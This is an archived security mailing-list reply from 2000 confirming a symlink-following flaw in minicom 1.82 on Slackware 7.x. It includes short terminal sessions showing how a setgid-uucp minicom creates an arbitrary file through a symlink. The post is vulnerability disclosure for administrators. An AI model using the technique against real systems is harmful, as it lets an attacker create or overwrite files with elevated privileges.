OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: Re: RH 6.1 / 6.2 minicom vulnerability
From: Ben Lull (blullVALLEYLOCAL.COM)
Date: Wed Aug 30 2000 - 19:03:45 CDT

Sylvain Robitaille wrote:

> Ben Lull wrote:
>
> > ... Yep Slackware (7.x) too using minicom 1.82 and 1.82.1
>
> One thing Ben's example didn't show is confirmation that this problem
> follows symlinks on his system, and creates the file accoring to the
> umask, which I've found to be the case on mine:

/* snip */

And the confirmation on Slackware 7.x using minicom 1.82 and 1.82.1...

Slackware 7.0
    metechnolust> ln -s /tmp/foo .
    metechnolust> ls -al /tmp/foo
    ls: /tmp/foo: No such file or directory
    metechnolust> (umask 2; minicom -C foo)
    minicom: cannot open /dev/ttyS1: Permission denied
    metechnolust> ls -al /tmp/foo
    -rw-rw-r-- 1 me uucp 0 Aug 30 16:49 /tmp/foo

Slackware 7.1
    memos> ln -s /tmp/foo .
    memos> ls -al /tmp/foo
    ls: /tmp/foo: No such file or directory
    memos> (umask 2; minicom -C foo)
    minicom: cannot open /dev/ttyS1: Permission denied
    memos> ls -al /tmp/foo
    -rw-rw-r-- 1 me uucp 0 Aug 30 16:46 /tmp/foo

Thanks,
Ben Lull

***
* Ben Lull
* Valley Local Internet, Inc
* Systems Administrator
***